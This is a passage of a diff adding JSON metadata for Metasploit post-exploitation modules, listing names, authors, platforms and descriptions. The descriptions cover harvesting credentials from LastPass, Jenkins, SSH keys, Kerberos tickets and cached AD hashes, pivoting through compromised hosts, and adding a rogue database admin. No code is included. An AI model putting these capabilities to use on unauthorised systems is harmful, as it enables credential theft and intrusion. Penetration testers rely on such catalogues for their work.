"check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/irssi_creds": { + "name": "Multi Gather IRSSI IRC Password(s)", + "fullname": "post/multi/gather/irssi_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jonathan Claudius " + ], + "description": "This module grabs IRSSI IRC credentials.", + "references": [], + "platform": "BSD,Linux,OSX,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/irssi_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/irssi_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/jboss_gather": { + "name": "JBoss Credential Collector", + "fullname": "post/multi/gather/jboss_gather", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Koen Riepe (koen.riepe " + ], + "description": "This module can be used to extract the JBoss admin passwords for version 4, 5 and 6.", + "references": [], + "platform": "Linux,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/jboss_gather.rb", + "is_install_path": true, + "ref_name": "multi/gather/jboss_gather", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/jenkins_gather": { + "name": "Jenkins Credential Collector", + "fullname": "post/multi/gather/jenkins_gather", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "thesubtlety" + ], + "description": "This module can be used to extract saved Jenkins credentials, user\n tokens, SSH keys, and secrets. Interesting files will be stored in\n loot along with combined csv output.", + "references": [], + "platform": "Linux,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/jenkins_gather.rb", + "is_install_path": true, + "ref_name": "multi/gather/jenkins_gather", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/lastpass_creds": { + "name": "LastPass Vault Decryptor", + "fullname": "post/multi/gather/lastpass_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Alberto Garcia Illera ", + "Martin Vigo ", + "Jon Hart " + ], + "description": "This module extracts and decrypts LastPass master login accounts and passwords,\n encryption keys, 2FA tokens and all the vault passwords", + "references": [ + "URL-http://www.martinvigo.com/even-the-lastpass-will-be-stolen-deal-with-it" + ], + "platform": "Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/lastpass_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/lastpass_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/maven_creds": { + "name": "Multi Gather Maven Credentials Collection", + "fullname": "post/multi/gather/maven_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "elenoir" + ], + "description": "This module will collect the contents of all users settings.xml on the targeted\n machine.", + "references": [], + "platform": "BSD,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/maven_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/maven_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/memory_search": { + "name": "Memory Search", + "fullname": "post/multi/gather/memory_search", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sjanusz-r7" + ], + "description": "This module allows for searching the memory space of running processes for\n potentially sensitive data such as passwords.", + "references": [], + "platform": "Linux,OSX,Unix,Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-24 19:55:53 +0000", + "path": "/modules/post/multi/gather/memory_search.rb", + "is_install_path": true, + "ref_name": "multi/gather/memory_search", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/minio_client": { + "name": "Gather MinIO Client Key", + "fullname": "post/multi/gather/minio_client", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Kali-Team " + ], + "description": "This module searches for MinIO Client credentials on a Windows host.", + "references": [ + "URL-https://blog.kali-team.cn/Metasploit-MinIO-Client-7d940c60ae8545aeaa29c96536dda855" + ], + "platform": "Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/multi/gather/minio_client.rb", + "is_install_path": true, + "ref_name": "multi/gather/minio_client", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "powershell", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/multi_command": { + "name": "Multi Gather Run Shell Command Resource File", + "fullname": "post/multi/gather/multi_command", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module will read shell commands from a resource file and\n execute the commands in the specified Meterpreter or shell session.", + "references": [], + "platform": "BSD,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/multi_command.rb", + "is_install_path": true, + "ref_name": "multi/gather/multi_command", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/netrc_creds": { + "name": "UNIX Gather .netrc Credentials", + "fullname": "post/multi/gather/netrc_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jon Hart " + ], + "description": "Post Module to obtain credentials saved for FTP and other services in .netrc", + "references": [], + "platform": "BSD,Linux,OSX,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/netrc_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/netrc_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/pgpass_creds": { + "name": "Multi Gather pgpass Credentials", + "fullname": "post/multi/gather/pgpass_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Zach Grace " + ], + "description": "This module will collect the contents of all users' .pgpass or pgpass.conf\n file and parse them for credentials.", + "references": [], + "platform": "BSD,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/pgpass_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/pgpass_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/pidgin_cred": { + "name": "Multi Gather Pidgin Instant Messenger Credential Collection", + "fullname": "post/multi/gather/pidgin_cred", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "bannedit ", + "Carlos Perez " + ], + "description": "This module will collect credentials from the Pidgin IM client if it is installed.", + "references": [], + "platform": "BSD,Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/pidgin_cred.rb", + "is_install_path": true, + "ref_name": "multi/gather/pidgin_cred", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/ping_sweep": { + "name": "Multi Gather Ping Sweep", + "fullname": "post/multi/gather/ping_sweep", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "Performs IPv4 ping sweep using the OS included ping command.", + "references": [], + "platform": "BSD,Linux,OSX,Solaris,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/ping_sweep.rb", + "is_install_path": true, + "ref_name": "multi/gather/ping_sweep", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/remmina_creds": { + "name": "UNIX Gather Remmina Credentials", + "fullname": "post/multi/gather/remmina_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jon Hart " + ], + "description": "Post module to obtain credentials saved for RDP and VNC from Remmina's configuration files.\n These are encrypted with 3DES using a 256-bit key generated by Remmina which is (by design)\n stored in (relatively) plain text in a file that must be properly protected.", + "references": [], + "platform": "BSD,Linux,OSX,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/remmina_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/remmina_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/resolve_hosts": { + "name": "Multi Gather Resolve Hosts", + "fullname": "post/multi/gather/resolve_hosts", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Ben Campbell " + ], + "description": "Resolves hostnames to either IPv4 or IPv6 addresses from the perspective of the remote host.", + "references": [], + "platform": "Python,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/resolve_hosts.rb", + "is_install_path": true, + "ref_name": "multi/gather/resolve_hosts", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/rsyncd_creds": { + "name": "UNIX Gather RSYNC Credentials", + "fullname": "post/multi/gather/rsyncd_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jon Hart " + ], + "description": "Post Module to obtain credentials saved for RSYNC in various locations", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/rsyncd_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/rsyncd_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/rubygems_api_key": { + "name": "Multi Gather RubyGems API Key", + "fullname": "post/multi/gather/rubygems_api_key", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jonathan Claudius ", + "Brandon Myers " + ], + "description": "This module obtains a user's RubyGems API key from ~/.gem/credentials.", + "references": [], + "platform": "BSD,Linux,OSX,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/rubygems_api_key.rb", + "is_install_path": true, + "ref_name": "multi/gather/rubygems_api_key", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/run_console_rc_file": { + "name": "Multi Gather Run Console Resource File", + "fullname": "post/multi/gather/run_console_rc_file", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module will read console commands from a resource file and\n execute the commands in the specified Meterpreter session.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/run_console_rc_file.rb", + "is_install_path": true, + "ref_name": "multi/gather/run_console_rc_file", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/saltstack_salt": { + "name": "SaltStack Salt Information Gatherer", + "fullname": "post/multi/gather/saltstack_salt", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die", + "c2Vlcgo" + ], + "description": "This module gathers information from SaltStack Salt masters and minions.\n Data gathered from minions: 1. salt minion config file\n Data gathered from masters: 1. minion list (denied, pre, rejected, accepted)\n 2. minion hostname/ip/os (depending on module settings)\n 3. SLS\n 4. roster, any SSH keys are retrieved and saved to creds, SSH passwords printed\n 5. minion config files\n 6. pillar data", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/post/multi/gather/saltstack_salt.rb", + "is_install_path": true, + "ref_name": "multi/gather/saltstack_salt", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/skype_enum": { + "name": "Multi Gather Skype User Data Enumeration", + "fullname": "post/multi/gather/skype_enum", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module will enumerate Skype account settings, contact list, call history, chat logs,\n file transfer history, and voicemail logs, saving all the data to CSV files for analysis.", + "references": [], + "platform": "OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/skype_enum.rb", + "is_install_path": true, + "ref_name": "multi/gather/skype_enum", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/ssh_creds": { + "name": "Multi Gather OpenSSH PKI Credentials Collection", + "fullname": "post/multi/gather/ssh_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jim Halfpenny" + ], + "description": "This module will collect the contents of all users' .ssh directories on the targeted\n machine. Additionally, known_hosts and authorized_keys and any other files are also\n downloaded. This module is largely based on firefox_creds.rb.", + "references": [], + "platform": "BSD,Linux,OSX,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/ssh_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/ssh_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/thunderbird_creds": { + "name": "Multi Gather Mozilla Thunderbird Signon Credential Collection", + "fullname": "post/multi/gather/thunderbird_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module will collect credentials from Mozilla Thunderbird by downloading\n the necessary files such as 'signons.sqlite', 'key3.db', and 'cert8.db' for\n offline decryption with third party tools.\n\n If necessary, you may also set the PARSE option to true to parse the sqlite\n file, which contains sensitive information such as the encrypted username/password.\n However, this feature is not enabled by default, because it requires SQLITE3 gem\n to be installed on your machine.", + "references": [], + "platform": "Linux,OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/thunderbird_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/thunderbird_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/tomcat_gather": { + "name": "Gather Tomcat Credentials", + "fullname": "post/multi/gather/tomcat_gather", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Koen Riepe " + ], + "description": "This module will attempt to collect credentials from Tomcat services running on the machine.", + "references": [], + "platform": "Linux,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/tomcat_gather.rb", + "is_install_path": true, + "ref_name": "multi/gather/tomcat_gather", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/ubiquiti_unifi_backup": { + "name": "Multi Gather Ubiquiti UniFi Controller Backup", + "fullname": "post/multi/gather/ubiquiti_unifi_backup", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die", + "zhangyoufu", + "justingist" + ], + "description": "On an Ubiquiti UniFi controller, reads the system.properties configuration file\n and downloads the backup and autobackup files. The files are then decrypted using\n a known encryption key, then attempted to be repaired by zip. Meterpreter must be\n used due to the large file sizes, which can be flaky on regular shells to read.\n Confirmed to work on 5.10.19 - 5.10.23, but most likely quite a bit more.\n If the zip can be repaired, the db and its information will be extracted.", + "references": [ + "URL-https://github.com/zhangyoufu/unifi-backup-decrypt/", + "URL-https://github.com/justingist/POSH-Ubiquiti/blob/master/Posh-UBNT.psm1", + "URL-https://help.ubnt.com/hc/en-us/articles/205202580-UniFi-system-properties-File-Explanation", + "URL-https://community.ubnt.com/t5/UniFi-Wireless/unf-controller-backup-file-format/td-p/1624105" + ], + "platform": "Linux,OSX,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-30 20:15:08 +0000", + "path": "/modules/post/multi/gather/ubiquiti_unifi_backup.rb", + "is_install_path": true, + "ref_name": "multi/gather/ubiquiti_unifi_backup", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/unix_cached_ad_hashes": { + "name": "UNIX Gather Cached AD Hashes", + "fullname": "post/multi/gather/unix_cached_ad_hashes", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Tim Brown " + ], + "description": "Post Module to obtain all cached AD hashes on the targeted UNIX machine. These can be cracked with John the Ripper (JtR).", + "references": [], + "platform": "AIX,Linux,OSX,Solaris,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/multi/gather/unix_cached_ad_hashes.rb", + "is_install_path": true, + "ref_name": "multi/gather/unix_cached_ad_hashes", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/unix_kerberos_tickets": { + "name": "UNIX Gather Kerberos Tickets", + "fullname": "post/multi/gather/unix_kerberos_tickets", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Tim Brown " + ], + "description": "Post Module to obtain all kerberos tickets on the targeted UNIX machine.", + "references": [], + "platform": "AIX,Linux,OSX,Solaris,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/multi/gather/unix_kerberos_tickets.rb", + "is_install_path": true, + "ref_name": "multi/gather/unix_kerberos_tickets", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/wlan_geolocate": { + "name": "Multiplatform WLAN Enumeration and Geolocation", + "fullname": "post/multi/gather/wlan_geolocate", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Tom Sellers " + ], + "description": "Enumerate wireless networks visible to the target device.\n Optionally geolocate the target by gathering local wireless networks and\n performing a lookup against Google APIs.", + "references": [], + "platform": "Android,BSD,Linux,OSX,Solaris,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/multi/gather/wlan_geolocate.rb", + "is_install_path": true, + "ref_name": "multi/gather/wlan_geolocate", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/gather/wowza_streaming_engine_creds": { + "name": "Gather Wowza Streaming Engine Credentials", + "fullname": "post/multi/gather/wowza_streaming_engine_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "bcoles " + ], + "description": "This module collects Wowza Streaming Engine user credentials.", + "references": [ + "URL-https://www.wowza.com/docs/use-http-providers-with-the-wowza-streaming-engine-java-api", + "URL-https://www.wowza.com/resources/WowzaStreamingEngine_UsersGuide-4.0.5.pdf" + ], + "platform": "Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/multi/gather/wowza_streaming_engine_creds.rb", + "is_install_path": true, + "ref_name": "multi/gather/wowza_streaming_engine_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter", + "powershell", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/general/close": { + "name": "Multi Generic Operating System Session Close", + "fullname": "post/multi/general/close", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "hdm " + ], + "description": "This module closes the specified session. This can be useful as a finisher for automation tasks.", + "references": [], + "platform": "Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/multi/general/close.rb", + "is_install_path": true, + "ref_name": "multi/general/close", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/general/execute": { + "name": "Multi Generic Operating System Session Command Execution", + "fullname": "post/multi/general/execute", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "hdm " + ], + "description": "This module executes an arbitrary command line", + "references": [], + "platform": "Linux,OSX,Unix,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/general/execute.rb", + "is_install_path": true, + "ref_name": "multi/general/execute", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/general/wall": { + "name": "Write Messages to Users", + "fullname": "post/multi/general/wall", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jon Hart " + ], + "description": "This module utilizes the wall(1) or write(1) utilities, as appropriate,\n to send messages to users on the target system.", + "references": [], + "platform": "Linux,OSX,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/general/wall.rb", + "is_install_path": true, + "ref_name": "multi/general/wall", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/autoroute": { + "name": "Multi Manage Network Route via Meterpreter Session", + "fullname": "post/multi/manage/autoroute", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "todb ", + "Josh Hale \"sn0wfa11\" " + ], + "description": "This module manages session routing via an existing\n Meterpreter session. It enables other modules to 'pivot' through a\n compromised host when connecting to the named NETWORK and SUBMASK.\n Autoadd will search a session for valid subnets from the routing table\n and interface list then add routes to them. Default will add a default\n route so that all TCP/IP traffic not specified in the MSF routing table\n will be routed through the session when pivoting. See documentation for more\n 'info -d' and click 'Knowledge Base'", + "references": [], + "platform": "", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/autoroute.rb", + "is_install_path": true, + "ref_name": "multi/manage/autoroute", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/dbvis_add_db_admin": { + "name": "Multi Manage DbVisualizer Add Db Admin", + "fullname": "post/multi/manage/dbvis_add_db_admin", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "David Bloom" + ], + "description": "Dbvisulaizer offers a command line functionality to execute SQL pre-configured databases\n (With GUI). The remote database can be accessed from the command line without the need\n to authenticate, which can be abused to create an administrator in the database with the\n proper database permissions. Note: This module currently only supports MySQL.", + "references": [ + "URL-http://youtu.be/0LCLRVHX1vA" + ], + "platform": "Linux,Windows", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-01 02:32:23 +0000", + "path": "/modules/post/multi/manage/dbvis_add_db_admin.rb", + "is_install_path": true, + "ref_name": "multi/manage/dbvis_add_db_admin", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "config-changes" + ], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_multi/manage/dbvis_query": { + "name": "Multi Manage DbVisualizer Query", + "fullname": "post/multi/manage/dbvis_query", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "David 